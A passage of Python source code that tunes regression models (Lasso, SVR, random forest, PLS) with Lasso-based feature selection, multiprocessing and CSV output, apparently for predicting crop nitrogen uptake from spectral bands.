global_dict['step_pct'] /= 10 global_dict['alpha'] *= (1-global_dict['step_pct']) print('alpha: {0}'.format(global_dict['alpha'])) print('Features selected: {0}'.format(global_dict['feat_n_sel'])) print('Iterations without progress: {0}\n'.format(global_dict['same_n'])) def alpha_min_parallel(global_dict, w_dict, lock, X1, y1, max_iter, random_seed, n_feats, exit_on_stagnant_n): # with lock: # makes sure other workers don't change if global_dict['same_n'] > exit_on_stagnant_n or global_dict['feat_n_sel'] == n_feats: # print(msg.format(n_feats, 'minimum')) return w_dict w_dict['feat_n_last'] = w_dict['feat_n_sel'] # perhaps we have to have a w_dict_master and w_dict for each worker # as is, I don't think f_lasso_feat_n() will be executed in parallel..? w_dict['feat_n_sel'] = f_lasso_feat_n(w_dict['alpha'], X1, y1, max_iter, random_seed) if global_dict['feat_n_sel'] == n_feats: # another worker found alpha return w_dict if w_dict['feat_n_sel'] == n_feats: with lock: global_dict['step_pct'] = w_dict['step_pct'] global_dict['alpha'] = w_dict['alpha'] global_dict['feat_n_sel'] = w_dict['feat_n_sel'] return w_dict w_dict['same_n'] += 1 if w_dict['feat_n_last'] == w_dict['feat_n_sel'] else -w_dict['same_n'] if w_dict['feat_n_sel'] < n_feats: w_dict['step_pct'] = gradient_descent_step_pct_alpha_min( w_dict['feat_n_sel'], w_dict['feat_n_last'], n_feats, w_dict['step_pct']) w_dict['alpha'] *= (1-w_dict['step_pct']) else: # we went over; go back to prvious step, make much smaller, and adjust alpha down a bit w_dict['alpha'] /= (1-w_dict['step_pct']) w_dict['step_pct'] /= 10 w_dict['alpha'] *= (1-w_dict['step_pct']) print('alpha: {0}'.format(w_dict['alpha'])) print('Features selected: {0}'.format(w_dict['feat_n_sel'])) print('Iterations without progress: {0}\n'.format(w_dict['same_n'])) if global_dict['feat_n_sel'] == n_feats: # another worker found alpha return w_dict else: return w_dict # with lock: # just to update global_dict # global_dict['last_to_report'] = w_dict['worker_n'] # global_dict['same_n'] += 1 if w_dict['same_n'] > 0 and global_dict['feat_n_last'] == w_dict['feat_n_sel'] else -global_dict['same_n'] # if w_dict['feat_n_sel'] < n_feats: # global_dict['step_pct'] = w_dict['step_pct'] # global_dict['alpha'] = w_dict['alpha'] def find_alpha_min_pp(X1, y1, max_iter, random_seed, n_feats, n_jobs, alpha_init=1e-3, step_pct=0.01, exit_on_stagnant_n=5): msg = ('Leaving while loop before finding the alpha value that achieves ' 'selection of {0} feature(s) ({1} alpha value to use).\n') feat_n_sel = n_feats+1 # initialize to enter the while loop while feat_n_sel > n_feats: feat_n_sel = f_lasso_feat_n(alpha_init, X1, y1, max_iter, random_seed) alpha_init *= 10 # adjust alpha_init until we get a reasonable number of features N_WORKERS = os.cpu_count() with Manager() as manager: lock = manager.Lock() global_dict = manager.dict(alpha=alpha_init, feat_n_last=feat_n_sel, feat_n_sel=feat_n_sel, step_pct=step_pct, same_n=0, fresh=True, last_to_report=0) while global_dict['feat_n_sel'] != n_feats: # Sends each worker/CPU the function to execute # worker_dicts = [] # for i in range(N_WORKERS): # w_dict = { # make a copy # 'worker_n'=i+1, # 'alpha'=global_dict['alpha'], # 'feat_n_last'=global_dict['feat_n_last'], # 'feat_n_sel'=global_dict['feat_n_sel'], # 'step_pct'=global_dict['step_pct'], # 'same_n'=global_dict['same_n']} # w_dict['step_pct'] = gradient_descent_step_pct_alpha_min( # w_dict['feat_n_sel'], w_dict['feat_n_last'], # n_feats, w_dict['step_pct']) # w_dict['alpha'] *= (1-w_dict['step_pct']) # global_dict['step_pct'] = w_dict['step_pct'] # global_dict['alpha'] = w_dict['alpha'] # worker_dicts = worker_dicts.append(worker_d) # pool = [Process(target=alpha_min_parallel, args=(global_dict, lock, X1, y1, max_iter, random_seed, n_feats, exit_on_stagnant_n)) # for _ in range(N_WORKERS)] pool = [Process(target=alpha_min_parallel, args=(global_dict, w_dict, lock, X1, y1, max_iter, random_seed, n_feats, exit_on_stagnant_n)) for w_dict in worker_dicts] for p in pool: p.start() for p in pool: p.join() # p.close() if global_dict['same_n'] > exit_on_stagnant_n: print(msg.format(n_feats, 'minimum')) break for p in pool: alpha = global_dict['alpha'] step_pct = global_dict['step_pct'] feat_n_sel = global_dict['feat_n_sel'] p.terminate() p.close() del p print('Alpha: {0}\nNumber of features:{1}'.format(global_dict['alpha'], global_dict['feat_n_sel'])) print('Using up to {0} selected features\n'.format(feat_n_sel)) return alpha, step_pct def build_feat_selection_df( X1, y1, max_iter, random_seed, n_feats=None, n_linspace=200, method_alpha_min='full', alpha_init=1e-3, step_pct=0.01): ''' Builds a dynamic list of all alpha values to try for features selection, with the goal of covering the full range of features from 1 to all features (max number of features is variable depending on dataset) The ``start`` variable in this function probably need to be adjusted, and really we have to come up with a better way to dynamically choose the start number.. method_alpha_min: options: "convergence_warning": proceeds normally until a ConvergenceWarning is reached, then just stops there (using this method is making the decision that we will stop short of testing the full feature set, and will only try up to the number of features that first produces a ConvergenceWarning). This option makes features selection much faster, but does not look at all features. "full": proceeds until all features are represented (feature selection can be slow, but will look at all features). ''' msg = ('``method_alpha_min`` must be either "full" or' '"convergence_warning"') assert method_alpha_min in ["full", "convergence_warning"], msg if n_feats is None: n_feats = X1.shape[1] else: n_feats = int(n_feats) if n_feats > X1.shape[1]: n_feats = X1.shape[1] alpha_min, step_pct = find_alpha_min( X1, y1, max_iter, random_seed, n_feats, alpha_init=alpha_init, step_pct=step_pct, method=method_alpha_min, exit_on_stagnant_n=5) # alpha_min, step_pct = find_alpha_min_pp( # X1, y1, max_iter, random_seed, n_feats, alpha_init=alpha_init, # step_pct=step_pct, exit_on_stagnant_n=5) start = np.log(alpha_min) alpha_max = find_alpha_max(X1, y1, max_iter, random_seed) # pretty easy to find stop = np.log(alpha_max) logspace_list = list(np.logspace(start, stop, num=n_linspace, base=np.e)) return logspace_list, alpha_min, step_pct def filter_logspace_list(logspace_list, X1, y1, max_iter, random_seed): df = None for alpha in logspace_list: _, feats, feat_ranking = feat_selection_lasso( X1, y1, alpha, max_iter, random_seed) df_temp = pd.DataFrame(data=[[alpha, len(feats), tuple(feats), tuple(feat_ranking)]], columns=['alpha', 'n_feats', 'feats', 'feat_ranking']) if df is None: df = df_temp.copy() else: df = df.append(df_temp) return df # df = df.drop_duplicates(subset=['feats'], ignore_index=True) # logspace_list_filtered = list(df['alpha']) # return logspace_list_filtered def filter_logspace_list_pp(logspace_list, X1, y1, max_iter, random_seed, n_jobs): # m = Manager() # lock = m.Lock() chunks = chunk_by_n(logspace_list, n_jobs*2) if len(logspace_list) < n_jobs * 2: chunks = chunk_by_n(logspace_list, n_jobs) # print('Length of logspace_list: {0}'.format(len(logspace_list))) # print('Number of chunks: {0}'.format(len(chunks))) chunk_avg = sum([len(i) for i in chunks]) / len(chunks) # print('Average length of each chunk: {0:.1f}'.format(chunk_avg)) # print('Number of cores: {0}\n'.format(n_jobs)) df_all = None with ProcessPoolExecutor(max_workers=n_jobs) as executor: for df_feats in executor.map( filter_logspace_list, chunks, it.repeat(X1), it.repeat(y1), it.repeat(max_iter), it.repeat(random_seed)): # with lock: if df_all is None: df_all = df_feats.copy() else: df_all = df_all.append(df_feats) df_all = df_all.drop_duplicates(subset=['feats'], ignore_index=True) logspace_list_filtered = list(reversed(sorted(df_all['alpha']))) return logspace_list_filtered @ignore_warnings(category=ConvergenceWarning) def model_tuning(model, param_grid, standardize, scoring, refit, X_select, y, cv_rep_strat, n_jobs=1): ''' X_select represents the X matrix of only the selected features from lasso feature selection process On MSI, n_jobs should be a positive integer, otherwise CPUs will probably be incorrectly allocated. Because we're parrallelizing higher in the loop, we can just put this at 1 core (after all, we have to run GridSearchCV many times). ''' # model_svr = SVR(tol=1e-2) transformer = TransformedTargetRegressor( regressor=model, transformer=PowerTransformer( 'yeo-johnson', standardize=standardize)) clf = GridSearchCV(transformer, param_grid, n_jobs=n_jobs, cv=cv_rep_strat, return_train_score=True, scoring=scoring, refit=refit) # with ignore_warnings(category=ConvergenceWarning): clf.fit(X_select, y) df_tune = pd.DataFrame(clf.cv_results_) return df_tune, transformer def get_tuning_scores_multiple(feats, feat_ranking, alpha, df_tune, cols, scoring1='neg_mean_absolute_error', scoring2='neg_mean_squared_error', scoring3=None): ''' Retrieves training and validation scores to be inserted into the results dataframe. ''' rank_score = 'rank_test_' + scoring1 scoring_train = 'mean_train_' + scoring1 scoring_test = 'mean_test_' + scoring1 std_train = 'std_train_' + scoring1 std_test = 'std_test_' + scoring1 scoring2_train = 'mean_train_' + scoring2 scoring2_test = 'mean_test_' + scoring2 std2_train = 'std_train_' + scoring2 std2_test = 'std_test_' + scoring2 if scoring3 is not None: scoring3_train = 'mean_train_' + scoring3 scoring3_test = 'mean_test_' + scoring3 std3_train = 'std_train_' + scoring3 std3_test = 'std_test_' + scoring3 score_train = df_tune[df_tune[rank_score] == 1][scoring_train].values[0] std_train = df_tune[df_tune[rank_score] == 1][std_train].values[0] score_val = df_tune[df_tune[rank_score] == 1][scoring_test].values[0] std_val = df_tune[df_tune[rank_score] == 1][std_test].values[0] score2_train = df_tune[df_tune[rank_score] == 1][scoring2_train].values[0] std2_train = df_tune[df_tune[rank_score] == 1][std2_train].values[0] score2_val = df_tune[df_tune[rank_score] == 1][scoring2_test].values[0] std2_val = df_tune[df_tune[rank_score] == 1][std2_test].values[0] if scoring3 is not None: score3_train = df_tune[df_tune[rank_score] == 1][scoring3_train].values[0] std3_train = df_tune[df_tune[rank_score] == 1][std3_train].values[0] score3_val = df_tune[df_tune[rank_score] == 1][scoring3_test].values[0] std3_val = df_tune[df_tune[rank_score] == 1][std3_test].values[0] params = df_tune[df_tune[rank_score] == 1]['params'].values[0] if scoring3 is None: data = [len(feats), alpha, score_train, std_train, score_val, std_val, score2_train, std2_train, score2_val, std2_val, params, feats, feat_ranking] else: data = [len(feats), alpha, score_train, std_train, score_val, std_val, score2_train, std2_train, score2_val, std2_val, score3_train, std3_train, score3_val, std3_val, params, feats, feat_ranking] df_temp = pd.DataFrame(data=[data], columns=cols) # for key in df_temp['tune_params'].values[0].keys(): # print('{0}: {1}'.format(key, df_temp['tune_params'].values[0][key])) return df_temp def print_model(model): '''Simply prints the model type of ``model``''' if isinstance(model, Lasso): print('Lasso:') if isinstance(model, SVR): print('Support vector regression:') if isinstance(model, RandomForestRegressor): print('Random forest:') if isinstance(model, PLSRegression): print('Partial least squares regression:') def get_lasso_feats(df_temp, key, transformer_lasso, X_select, y): ''' Because Lasso has it's own feature selection built right into the aglorithm, it may be desireable to see the actual features used by the prediction model. This function gets the features chosen from feature selection and adds them as two additional columns to the dataframe. ''' las2_alpha = df_temp['tune_params'].values[0][f'{key}alpha'] # to figure out which bands were actually used transformer_lasso.set_params(**{f'{key}alpha': las2_alpha}) key_c = f'{key}'[:-2] transformer_lasso.get_params()[key_c].fit(X_select, y) model_bs2 = SelectFromModel(transformer_lasso.get_params()[key_c], prefit=True) feats_used = model_bs2.get_support(indices=True) df_temp['feat_n_used'] = len(feats_used) df_temp['features_used'] = [feats_used] return df_temp def tune_model(X_select, y, model, param_grid, standardize, scoring, scoring_refit, key, cv_rep_strat, feats, feat_ranking, alpha, cols): ''' Tunes a single model and appends results as a new row to df_full ''' # cols_e = cols.extend(['feat_n_used', 'features_used']) data = [len(feats), alpha] data[2:] = [np.nan] * 15 if (len(feats) == 0) or (isinstance(model, PLSRegression) and len(feats) <= 1): df_temp = pd.DataFrame(data=[data], columns=cols) else: df_tune, transformer = model_tuning( model, param_grid, standardize, scoring, scoring_refit, X_select, y, cv_rep_strat) df_temp = get_tuning_scores_multiple( feats, feat_ranking, alpha, df_tune, cols, scoring1=scoring[0], scoring2=scoring[1], scoring3=scoring[2]) if isinstance(model, Lasso) and len(feats) > 0: df_temp = get_lasso_feats(df_temp, key, transformer, X_select, y) elif isinstance(model, Lasso) and len(feats) == 0: df_temp['feat_n_used'] = len(feats) df_temp['features_used'] = [feats] return df_temp # @ignore_warnings(category=ConvergenceWarning) def execute_tuning(alpha_list, X, y, model_list, param_grid_dict, standardize, scoring, scoring_refit, max_iter, random_seed, key, df_train, n_splits, n_repeats, print_results=False): ''' Execute model tuning, saving gridsearch hyperparameters for each number of features. ''' cols = [ 'feat_n', 'alpha', 'score_train_mae', 'std_train_mae', 'score_val_mae', 'std_val_mae', 'score_train_mse', 'std_train_mse', 'score_val_mse', 'std_val_mse', 'score_train_r2', 'std_train_r2', 'score_val_r2', 'std_val_r2', 'tune_params', 'features', 'feat_ranking'] param_grid_dict_key = param_grid_add_key(param_grid_dict, key) df_tune_feat_list = (None,) * len(model_list) # alpha_list = chunks[7] for alpha in alpha_list: X_select, feats, feat_ranking = feat_selection_lasso( X, y, alpha, max_iter, random_seed) print('Number of features: {0}'.format(len(feats))) temp_list = [] for idx1, (model, param_grid) in enumerate(zip(model_list, param_grid_dict_key.values())): cv_rep_strat = get_repeated_stratified_kfold( df_train, n_splits, n_repeats, random_seed) param_grid_dc = deepcopy(param_grid) # will show a verbose warning if n_components exceeds n_feats if f'{key}n_components' in param_grid_dc: n_comp = param_grid_dc[f'{key}n_components'] if len(feats) < max(n_comp): print('Trimming excess components in <param_grid>...') n_comp_trim = [i for i in n_comp if i <= len(feats)] param_grid_dc[f'{key}n_components'] = n_comp_trim # print('n_components: {0}'.format(param_grid_dc[f'{key}n_components'])) df_tune_temp = tune_model( X_select, y, model, param_grid_dc, standardize, scoring, scoring_refit, key, cv_rep_strat, feats, feat_ranking, alpha, cols) if print_results is True: print_model(model) print('R2: {0:.3f}\n'.format(df_tune_temp['score_val_r2'].values[0])) temp_list.append(df_tune_temp) df_tune_feat_list = append_tuning_results(df_tune_feat_list, temp_list) return df_tune_feat_list # len(df_tune_feat_list[0]) # len(df_tune_feat_list[1]) # @ignore_warnings(category=ConvergenceWarning) def execute_tuning_pp( logspace_list, X1, y1, model_list, param_grid_dict, standardize, scoring, scoring_refit, max_iter, random_seed, key, df_train, n_splits, n_repeats, df_tune_all_list, n_jobs): ''' Actual execution of hyperparameter tuning via multi-core processing ''' # m = Manager() # lock = m.Lock() # chunks = chunk_by_n(reversed(logspace_list)) # chunk_size = int(len(logspace_list) / (n_jobs*2)) + 1 chunks = chunk_by_n(logspace_list, n_jobs*2) # remember this shuffles logspace_list if len(logspace_list) < n_jobs * 2: chunks = chunk_by_n(logspace_list, n_jobs) # print('Length of logspace_list: {0}'.format(len(logspace_list))) # print('Number of chunks: {0}'.format(len(chunks))) chunk_avg = sum([len(i) for i in chunks]) / len(chunks) # print('Average length of each chunk: {0:.1f}'.format(chunk_avg)) # print('Number of cores: {0}\n'.format(n_jobs)) with ProcessPoolExecutor(max_workers=n_jobs) as executor: # for alpha, df_tune_feat_list in zip(reversed(logspace_list), executor.map(execute_tuning, it.repeat(X1), it.repeat(y1), it.repeat(model_list), it.repeat(param_grid_dict), reversed(logspace_list), # it.repeat(standardize), it.repeat(scoring), it.repeat(scoring_refit), it.repeat(max_iter), it.repeat(random_seed), # it.repeat(key), it.repeat(df_train), it.repeat(n_splits), it.repeat(n_repeats))): for df_tune_feat_list in executor.map(execute_tuning, chunks, it.repeat(X1), it.repeat(y1), it.repeat(model_list), it.repeat(param_grid_dict), it.repeat(standardize), it.repeat(scoring), it.repeat(scoring_refit), it.repeat(max_iter), it.repeat(random_seed), it.repeat(key), it.repeat(df_train), it.repeat(n_splits), it.repeat(n_repeats)): # chunksize=chunk_size)) # print('type: {0}'.format(type(df_tune_feat_list[0]))) # print('len: {0}'.format(len(df_tune_feat_list))) # print('Len: {0}'.format(len(df_tune_all_list))) # with lock: df_tune_all_list = append_tuning_results(df_tune_all_list, df_tune_feat_list) return df_tune_all_list # chunk_size = int(len(logspace_list) / (os.cpu_count()*2)) # chunks = [logspace_list[x:x+chunk_size] for x in range(0, len(logspace_list), chunk_size)] # with ProcessPoolExecutor() as executor: # array = [(X1, y1, model_list, param_grid_dict, alpha, standardize, # scoring, scoring_refit, max_iter, random_seed, key, df_train, # n_splits, n_repeats) # for alpha in reversed(logspace_list)] # # executor.map(execute_tuning, *zip(*array)) # for alpha, df_tune_feat_list in zip( # reversed(logspace_list), # executor.map(execute_tuning, *zip(*array))): # # print('Alpha: {0}\nResult: {1}\n'.format(alpha, df_tune_feat_list)) # df_tune_all_list = append_tuning_results( # df_tune_all_list, df_tune_feat_list) # return df_tune_all_list def filter_tuning_results(df_tune_all_list, score): ''' Remove dupilate number of features (keep only lowest error) ''' df_tune_list = () for df_tune in df_tune_all_list: df_tune = df_tune.reset_index(drop=True) array_idx = df_tune.groupby(['feat_n'])[score].transform(max) == df_tune[score] # if first non-zero feat_n row is NaN, include that so other dfs have same number of rows (PLS) if np.isnan(df_tune.loc[df_tune['feat_n'].idxmin(),score]): array_idx.loc[df_tune['feat_n'].idxmin()] = True df_tune['feat_n'] = df_tune['feat_n'].apply(pd.to_numeric) df_filtered = df_tune[array_idx].drop_duplicates(['feat_n']).sort_values('feat_n').reset_index(drop=True) df_tune_list += (df_filtered,) return df_tune_list def summarize_tuning_results(df_tune_list, model_list, param_grid_dict, key=''): ''' Summarizes the hyperparameters from the tuning process into a single dataframe ''' cols_params = ['feat_n'] for k1, v1 in param_grid_dict.items(): for k2, v2 in param_grid_dict[k1].items(): k2_short = k2.replace(key, '') cols_params.append(k1 + '_' + k2_short) df_params = pd.DataFrame(columns=cols_params) # for each feature (if missing just put nan) feat_max = max([df['feat_n'].max() for df in df_tune_list]) for feat_n in range(1,feat_max+1): data_dict = {i: np.nan for i in cols_params} data_dict['feat_n'] = [feat_n] for idx_df, df_original in enumerate(df_tune_list): df = df_original.copy() df.set_index('feat_n', inplace=True) if isinstance(model_list[idx_df], Lasso) and feat_n in df.index: las_params = df.loc[feat_n]['tune_params'] try: las_alpha = las_params[f'{key}alpha'] except TypeError: # when cell is nan instead of dict continue # go to next index where there is actually data data_dict['las_alpha'] = [las_alpha] elif isinstance(model_list[idx_df], SVR) and feat_n in df.index: svr_params = df.loc[feat_n]['tune_params'] svr_kernel = svr_params[f'{key}kernel'] try: svr_gamma = svr_params[f'{key}gamma'] except KeyError: svr_gamma = np.nan svr_C = svr_params[f'{key}C'] svr_epsilon = svr_params[f'{key}epsilon'] data_dict['svr_kernel'] = [svr_kernel] data_dict['svr_gamma'] = [svr_gamma] data_dict['svr_C'] = [svr_C] data_dict['svr_epsilon'] = [svr_epsilon] elif isinstance(model_list[idx_df], RandomForestRegressor) and feat_n in df.index: rf_params = df.loc[feat_n]['tune_params'] rf_min_samples_split = rf_params[f'{key}min_samples_split'] rf_max_feats = rf_params[f'{key}max_features'] data_dict['rf_min_samples_split'] = [rf_min_samples_split] data_dict['rf_max_feats'] = [rf_max_feats] elif isinstance(model_list[idx_df], PLSRegression) and feat_n in df.index: # The model shouldn't even be in model_list if there is no information for it. # This was changed when the PLS component list was modified to cut out # components that are greater than number of features (e.g., we can't # tune on 8 components with 4 features). # Thus, assume the "garbage" was filtered out already and we will only # arrive here if 'tune_params' exists. pls_params = df.loc[feat_n]['tune_params'] if pd.notnull(pls_params): pls_n_components = pls_params[f'{key}n_components'] pls_scale = pls_params[f'{key}scale'] else: pls_n_components = np.nan pls_scale = np.nan data_dict['pls_n_components'] = [pls_n_components] data_dict['pls_scale'] = [pls_scale] df_summary_row = pd.DataFrame.from_dict(data=data_dict) df_params = df_params.append(df_summary_row) return df_params.reset_index(drop=True) def append_tuning_results(df_tune_all_list, df_tune_feat_list): ''' Appends tune_feat to tune_all as a list/tuple ''' msg = ('<df_tune_all_list> and <df_tune_feat_list> must be the same ' 'length.') assert len(df_tune_all_list) == len(df_tune_feat_list), msg df_out_list = () for df_all, df_single in zip(df_tune_all_list, df_tune_feat_list): if df_all is None and df_single is not None: df_all = df_single.copy() elif df_all is not None and df_single is not None: df_all = df_all.append(df_single) else: pass df_out_list += (df_all,) return df_out_list def tuning_mode_count(df_params, svr_only=False): ''' Calculates the mode and count of the most popular ``svr_only`` needs work ''' cols_params = list(df_params.columns) if 'feat_n' in cols_params: cols_params.remove('feat_n') if svr_only is True: kernel_mode = df_params['svr_kernel'].mode().values[0] df_params_mode = df_params[df_params['svr_kernel'] == kernel_mode][cols_params].mode() n_obs = len(df_params[df_params['svr_kernel'] == kernel_mode][cols_params]) else: df_params_mode = df_params[cols_params].mode() n_obs = len(df_params[cols_params]) data = [] for col_name in df_params_mode.columns: val_count = df_params_mode.loc[0][col_name] try: count = df_params[col_name].value_counts()[val_count] except TypeError: count = df_params[col_name].value_counts()[int(val_count)] except KeyError: count = np.nan data.append(count/n_obs) df_params_mode_count = pd.DataFrame(data=[data], columns=df_params_mode.columns) return df_params_mode, df_params_mode_count def feats_readme(fname_feats_readme, fname_data, meta_bands, extra_feats=None): ''' Describes the features being used from df_join to tune and train the models. Parameters: dir_feats (``str``): The directory to create the README.txt file bands (``dict``): Dictionary containing band number (keys) and center wavelength (values). ''' with open(os.path.join(fname_feats_readme), 'w+') as f: f.write('Features available for tuning:\n\n') f.write('Feature number: Wavelength (for spectral and derivative ' 'features only)\n' 'Any "extra" features are described by the column name from ' 'their input data source\n') f.write('Training data is saved at:\n') f.write('{0}\n'.format(fname_data)) for k, v in sorted(meta_bands.items()): # print("{0}: {1}\n".format(k, v)) f.write('{0}: {1}\n'.format(k, v)) n = max(meta_bands) if isinstance(extra_feats, str): n += 1 f.write('{0}: {1}\n'.format(n, extra_feats)) elif isinstance(extra_feats, list): for ef in extra_feats: n += 1 f.write('{0}: {1}\n'.format(n, ef)) def save_tuning_results( dir_out_tune, df_tune_list, model_list, df_params, df_params_mode, df_params_mode_count, meta_bands, fname_base='msi_00_000_measurement_units'): ''' Saves all tuning results to ``dir_out_tune`` Parameters: fname_base (``str``): the beginning of the final file names to be saved. Other information will be appended to this string to desribe predictions/scoring, as well as the model being used. ''' tune_str = '-tuning-' for idx, model in enumerate(model_list): df = df_tune_list[idx] if isinstance(model, Lasso): model_str = 'lasso' elif isinstance(model, SVR): model_str = 'svr' elif isinstance(model, RandomForestRegressor): model_str = 'rf' elif isinstance(model, PLSRegression): model_str = 'pls' fname_model = os.path.join( dir_out_tune, fname_base + tune_str + model_str + '.csv') df.to_csv(fname_model, index=False) fname_tuning1 = os.path.join(dir_out_tune, fname_base + tune_str + 'summary.csv') df_params.to_csv(fname_tuning1, index=False) fname_tuning2 = os.path.join(dir_out_tune, fname_base + tune_str + 'mode.csv') df_params_mode.to_csv(fname_tuning2, index=False) fname_tuning3 = os.path.join(dir_out_tune, fname_base + tune_str + 'mode-count.csv') df_params_mode_count.to_csv(fname_tuning3, index=False) def load_tuning_results(dir_out_tune, model_list, fname_base='msi_00_000_measurement_units'): tune_str = '-tuning-' df_tune_list = () for model in model_list: if isinstance(model, Lasso): model_str = 'lasso' elif isinstance(model, SVR): model_str = 'svr' elif isinstance(model, RandomForestRegressor): model_str = 'rf' elif isinstance(model, PLSRegression): model_str = 'pls' fname_model = os.path.join( dir_out_tune, fname_base + tune_str + model_str + '.csv') # df_tune_list.append(pd.read_csv(fname_model)) df_tune_list += (pd.read_csv(fname_model),) fname_params = os.path.join( dir_out_tune, fname_base + tune_str + 'summary.csv') df_params = pd.read_csv(fname_params) fname_mode = os.path.join( dir_out_tune, fname_base + tune_str + 'mode.csv') df_params_mode = pd.read_csv(fname_mode) fname_count = os.path.join( dir_out_tune, fname_base + tune_str + 'mode-count.csv') df_params_mode_count = pd.read_csv(fname_count) return df_tune_list, df_params, df_params_mode, df_params_mode_count # In[Model testing functions] def get_errors(model, X, y): ''' Returns the MAE, RMSE, MSLE, and R2 for a fit model ''' y_pred = model.predict(X) mae = mean_absolute_error(y, y_pred) rmse = np.sqrt(mean_squared_error(y, y_pred)) r2 = r2_score(y, y_pred) return y_pred, mae, rmse, r2 def prep_pred_dfs(df_test, feat_n_list, y_label='nup_kgha'): cols_scores = ['feat_n', 'feats', 'score_train_mae', 'score_test_mae', 'score_train_rmse', 'score_test_rmse', 'score_train_r2', 'score_test_r2'] cols_meta = ['study', 'date', 'plot_id', 'trt', 'rate_n_pp_kgha', 'rate_n_sd_plan_kgha', 'rate_n_total_kgha', 'growth_stage', y_label] cols_preds = cols_meta + feat_n_list df_pred = pd.DataFrame(columns=cols_preds) df_pred[cols_meta] = df_test[cols_meta] df_score = pd.DataFrame(columns=cols_scores) return df_pred, df_score def get_params(params, idx=None, col='tune_params'): ''' Retrieves dictionary of paramters to use for model training; can be either pd.DataFrame or dictionary; if dictionary, just returns itself ''' if isinstance(params, pd.DataFrame): assert idx is not None, ('"idx" must be defined') try: params_dict = literal_eval(params.iloc[idx][col]) except ValueError: params_dict = params.iloc[idx][col] # except IndexError: elif isinstance(params, dict): # else must be dict params_dict = params.copy() else: params_dict = None return params_dict def get_params_row(row, col='tune_params'): ''' Retrieves dictionary of paramters to use for model training; can be either a pd.Series (single row of pd.DataFrame) or dictionary; if dictionary, just returns itself ''' if isinstance(row, pd.Series): try: params_dict = literal_eval(row[col]) except ValueError: params_dict = row[col] # except IndexError: elif isinstance(row, dict): # else must be dict params_dict = row.copy() else: params_dict = None return params_dict def get_params_all(params_las, params_svr, params_rf, params_pls, idx=None, col='tune_params'): ''' Retrieves parameters for all models ''' params_las_dict = get_params(params_las, idx=idx, col=col) params_svr_dict = get_params(params_svr, idx=idx, col=col) params_rf_dict = get_params(params_rf, idx=idx, col=col) params_pls_dict = get_params(params_pls, idx=idx, col=col) return params_las_dict, params_svr_dict, params_rf_dict, params_pls_dict def get_feats_int(row, y_col='features', idx=False): ''' Returns a list of integers that represent band numbers ''' try: feats = row[y_col].strip('[]').split(' ') feats_int = [] for item in feats: if item == '': pass elif '\n' in item: item = item.replace('\n','') feats_int.append(int(item)) else: feats_int.append(int(item)) except AttributeError: feats_int = list(row['features']) return feats_int def check_for_multiple(model, df): ''' Checks if model and df are a list; if so, we have to test multiple models Returns ``model`` and ``df`` as lists. If ``model`` was input as a single model, it is returned as a list with lenght equal to one. ''' msg1 = ('If passing multiple models, ``model`` and ``df`` must both be ' 'lists and must have equal lengths.') if isinstance(model, list): assert isinstance(df, list), msg1 assert len(model) == len(df), msg1 else: model_list = [model] df_list = [df] return model_list, df_list def predict_me(model, params_dict, standardize, X1_select, y1, X1_test_select, y1_test, feats_int, df_pred, df_score): ''' Uses params_dict to set up the model, train, test, and report error ''' if isinstance(params_dict, dict): # model_pls = PLSRegression(tol=1e-9) transformed_model = TransformedTargetRegressor( regressor=model, transformer=PowerTransformer( 'yeo-johnson', standardize=standardize)) transformed_model.set_params(**params_dict) transformed_model.fit(X1_select, y1) _, train_mae, train_rmse, train_r2 = get_errors( transformed_model, X1_select, y1) y_pred, test_mae, test_rmse, test_r2 = get_errors( transformed_model, X1_test_select, y1_test) data = [len(feats_int), feats_int, train_mae, test_mae, train_rmse, test_rmse, train_r2, test_r2] elif isinstance(model, PLSRegression) and pd.isnull(params_dict): # PLS requires at least two features; just record Nan for this row data = [len(feats_int), feats_int] data.extend([np.nan] * 6) y_pred = [np.nan] * len(df_pred) # else: # print('nope') # print(params_dict) # print(type(model)) df_temp_scores = pd.DataFrame(data=[data], columns=df_score.columns) df_score = df_score.append(df_temp_scores) df_pred[len(feats_int)] = y_pred return df_pred, df_score def test_predictions(df_test, X1, y1, X1_test, y1_test, model_list, df_tune_list, feat_n_list, y_label='nup_kgha', max_iter=5000, standardize=False, key='', n_feats_linspace=50): ''' Predicts ``y1_test`` for one or many models. model (``sklearn`` model): The model to be used to make predictions. Can be a list of models to test multiple models, but ``df`` must also be a list with an equal number with tuning hyperparameters corresponding to each model. df (``pandas.DataFrame``): Dataframe containing the tuning hyperparameters to use for model testing. Can be a list with equal length of ``model``. ''' df_pred, df_score = prep_pred_dfs( df_test, feat_n_list, y_label=y_label) df_pred_list = () df_score_list = () for i in range(len(model_list)): # df_pred_list.append(df_pred.copy()) # df_score_list.append(df_score.copy()) df_pred_list += (df_pred.copy(),) df_score_list += (df_score.copy(),) # for idx_tune, row1 in df_tune_list[0].iterrows(): # must be sure 'features' exists in all dfs # if idx_tune == 0: # break # feats_int = get_feats_int(row, y_col='features') # X1_select = X1[:, feats_int] # X1_test_select = X1_test[:, feats_int] # for idx_model, model in enumerate(model_list): # df_tune = df_tune_list[idx_model] # df_pred = df_pred_list[idx_model] # df_score = df_score_list[idx_model] # feats_int = get_feats_int(row, y_col='features') # X1_select = X1[:, feats_int] # X1_test_select = X1_test[:, feats_int] # params_dict = get_params(df_tune, idx=idx_tune) for feat_n in df_tune_list[0]['feat_n']: # if feat_n == 1: # break for idx_model, model in enumerate(model_list): df_tune = df_tune_list[idx_model] df_pred = df_pred_list[idx_model] df_score = df_score_list[idx_model] row = df_tune[df_tune['feat_n'] == feat_n] # print(row) if len(row) == 0: continue row = row.squeeze() # changes row from pd.Dataframe to pd.Series if pd.isnull(row.score_train_mae): # not sure why, but sometimes row is len == 0, and sometimes it is len == 1 with all null continue feats_int = get_feats_int(row, y_col='features') X1_select = X1[:, feats_int] X1_test_select = X1_test[:, feats_int] # params_dict = get_params(df_tune, idx=idx_tune) # print(model) # print(row) params_dict = get_params_row(row) if (isinstance(model, PLSRegression) and isinstance(params_dict, dict) and params_dict[f'{key}n_components'] > len(feats_int)): params_dict[f'{key}n_components'] = len(feats_int) df_pred, df_score = predict_me( model, params_dict, standardize, X1_select, y1, X1_test_select, y1_test, feats_int, df_pred, df_score) # df_pred_list[idx_model] = df_pred # df_score_list[idx_model] = df_score df_pred_list = df_pred_list[:idx_model] + (df_pred,) + df_pred_list[idx_model+1:] df_score_list = df_score_list[:idx_model] + (df_score,) + df_score_list[idx_model+1:] # model, df_tune, params_dict, standardize, X1_select, y1, # X1_test_select, y1_test, feats_int, df_pred, df_score) for idx_model, model in enumerate(model_list): df_score = df_score_list[idx_model] new_index = 